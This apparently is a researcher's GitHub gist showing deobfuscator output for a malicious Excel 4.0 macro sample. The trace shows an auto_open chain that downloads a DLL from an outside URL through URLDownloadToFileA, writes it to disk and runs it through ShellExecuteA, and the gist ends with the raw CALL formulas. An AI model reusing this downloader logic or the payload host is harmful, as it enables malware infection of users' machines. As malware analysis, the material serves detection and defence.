Skip to content

Instantly share code, notes, and snippets.

@JohnLaTwC

JohnLaTwC/96cefc000e35446bf3d2cc117df80858f8df2caa9395aa2e9a0862646ee150e3

Created May 28, 2020 19:01
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JohnLaTwC/9da5e447a99271b11ea33ad78364c528 to your computer and use it in GitHub Desktop.
Save JohnLaTwC/9da5e447a99271b11ea33ad78364c528 to your computer and use it in GitHub Desktop.
Download ZIP
xls4 macro
Raw
96cefc000e35446bf3d2cc117df80858f8df2caa9395aa2e9a0862646ee150e3
_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
| ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
| | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
| | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
| | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
| (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
(______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
File: 96cefc000e35446bf3d2cc117df80858f8df2caa9395aa2e9a0862646ee150e3
[Loading Cells]
auto_open: auto_openvzynk->faPjaRepYXLwYuHVDU!$HG$293
[Starting Deobfuscation]
CELL:HG293 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EB187)
CELL:EB187 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HA1034)
CELL:HA1034 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AN1244)
CELL:AN1244 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!BP208)
CELL:BP208 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!ES400)
CELL:ES400 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!D438)
CELL:D438 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EI790)
CELL:EI790 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!FY1712)
CELL:FY1712 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!BE619)
CELL:BE619 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HI394)
CELL:HI394 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EZ1276)
CELL:EZ1276 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EL722)
CELL:EL722 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!GJ1520)
CELL:GJ1520 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EL1476)
CELL:EL1476 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EZ954)
CELL:EZ954 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AO1192)
CELL:AO1192 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!BL159)
CELL:BL159 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AO1451)
CELL:AO1451 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!C1975)
CELL:C1975 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HM309)
CELL:HM309 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EL1994)
CELL:EL1994 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AC1739)
CELL:AC1739 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EB1915)
CELL:EB1915 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AZ778)
CELL:AZ778 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!CW236)
CELL:CW236 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!BS225)
CELL:BS225 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DL878)
CELL:DL878 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AW1474)
CELL:AW1474 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DW1356)
CELL:DW1356 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!GK944)
CELL:GK944 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!GB1406)
CELL:GB1406 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EB229)
CELL:EB229 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!IL403)
CELL:IL403 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!IM1083)
CELL:IM1083 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AV192)
CELL:AV192 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HG1109)
CELL:HG1109 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!FL1338)
CELL:FL1338 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DK988)
CELL:DK988 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!FY267)
CELL:FY267 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AG826)
CELL:AG826 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!BO145)
CELL:BO145 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!R197)
CELL:R197 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!ID1786)
CELL:ID1786 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!IO776)
CELL:IO776 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DX1620)
CELL:DX1620 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HL250)
CELL:HL250 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EA1465)
CELL:EA1465 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DX1120)
CELL:DX1120 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!GZ1158)
CELL:GZ1158 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!GL1458)
CELL:GL1458 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!CM1317)
CELL:CM1317 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DX1978)
CELL:DX1978 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!I1735)
CELL:I1735 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!CD482)
CELL:CD482 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!IE1434)
CELL:IE1434 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!GY744)
CELL:GY744 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AC1017)
CELL:AC1017 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AL1653)
CELL:AL1653 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!CR1291)
CELL:CR1291 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!CW552)
CELL:CW552 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!CR801)
CELL:CR801 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!IG795)
CELL:IG795 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!CB1416)
CELL:CB1416 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!S647)
CELL:S647 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DS72)
CELL:DS72 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!IC1270)
CELL:IC1270 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!C1789)
CELL:C1789 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!IF1600)
CELL:IF1600 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!IJ232)
CELL:IJ232 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!FD1950)
CELL:FD1950 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!FC1053)
CELL:FC1053 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HQ556)
CELL:HQ556 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HK42)
CELL:HK42 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!FE1675)
CELL:FE1675 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!BO151)
CELL:BO151 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!GR1274)
CELL:GR1274 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DO199)
CELL:DO199 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!CK38)
CELL:CK38 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!FJ53)
CELL:FJ53 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HY738)
CELL:HY738 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HP1080)
CELL:HP1080 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!G731)
CELL:G731 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!FK1303)
CELL:FK1303 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HN1162)
CELL:HN1162 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DK1259)
CELL:DK1259 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DH229)
CELL:DH229 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HV1548)
CELL:HV1548 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AY361)
CELL:AY361 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!IF1956)
CELL:IF1956 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HK1254)
CELL:HK1254 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!GN1160)
CELL:GN1160 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HC1875)
CELL:HC1875 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AH1491)
CELL:AH1491 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DG1190)
CELL:DG1190 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!IM989)
CELL:IM989 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HW1734)
CELL:HW1734 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AZ1331)
CELL:AZ1331 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EU1616)
CELL:EU1616 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!BA644)
CELL:BA644 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DJ445)
CELL:DJ445 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!BN76)
CELL:BN77 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DN1885)
CELL:DN1885 , FullEvaluation , FORMULA("https://aonagenarian.eu/3/skp.dll",$BB$54)
CELL:DN1886 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!GE1302)
CELL:GE1303 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AA1214)
CELL:AA1214 , FullEvaluation , FORMULA("C:\DlkYKlI\UiQhUYx\sncwnes.dll&"",DllRegisterServer""",$AP$28)
CELL:AA1215 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DP16)
CELL:DP17 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!GY603)
CELL:GY603 , FullEvaluation , FORMULA("C:\DlkYKlI\UiQhUYx\sncwnes.dll",$EN$1690)
CELL:GY604 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EI45)
CELL:EI46 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!FZ191)
CELL:FZ191 , FullEvaluation , FORMULA("URLMON",$GH$541)
CELL:FZ192 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!BN1370)
CELL:BN1371 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!FV761)
CELL:FV761 , FullEvaluation , FORMULA("URLDownloadToFileA",$AH$99)
CELL:FV762 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!Q702)
CELL:Q703 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DW1188)
CELL:DW1188 , FullEvaluation , FORMULA("JJCCJJ",$HF$990)
CELL:DW1189 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!ID1917)
CELL:ID1918 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!I1337)
CELL:I1337 , FullEvaluation , FORMULA("0hell32",$FC$1696)
CELL:I1338 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!W388)
CELL:W389 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!HM308)
CELL:HM308 , FullEvaluation , FORMULA("ShellExecuteA",$DS$1912)
CELL:HM309 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EL1994)
CELL:EL1994 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AC1739)
CELL:AC1739 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!EB1915)
CELL:EB1915 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AZ778)
CELL:AZ778 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!CW236)
CELL:CW236 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!BS225)
CELL:BS225 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DL878)
CELL:DL878 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!AW1474)
CELL:AW1474 , FullEvaluation , RUN(faPjaRepYXLwYuHVDU!DW1356)
[END of Deobfuscation]
time elapsed: 0.9059727191925049
-------------------
What about:
Sheet faPjaRepYXLwYuHVDU, around cell DJ446:
=CALL($CP$768,$Q$876,$GC$956,$K$462,0)
=CALL($CP$768,$Q$876,$GC$956,$IA$1490,0)
=CALL($GH$541,$AH$99,$HF$990,0,$BB$54,$EN$1690,0,0)
=CALL($FC$1696,$DS$1912,$FU$967,0,$DN$1585,$FG$240,$AP$28,0,0)
=HALT()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment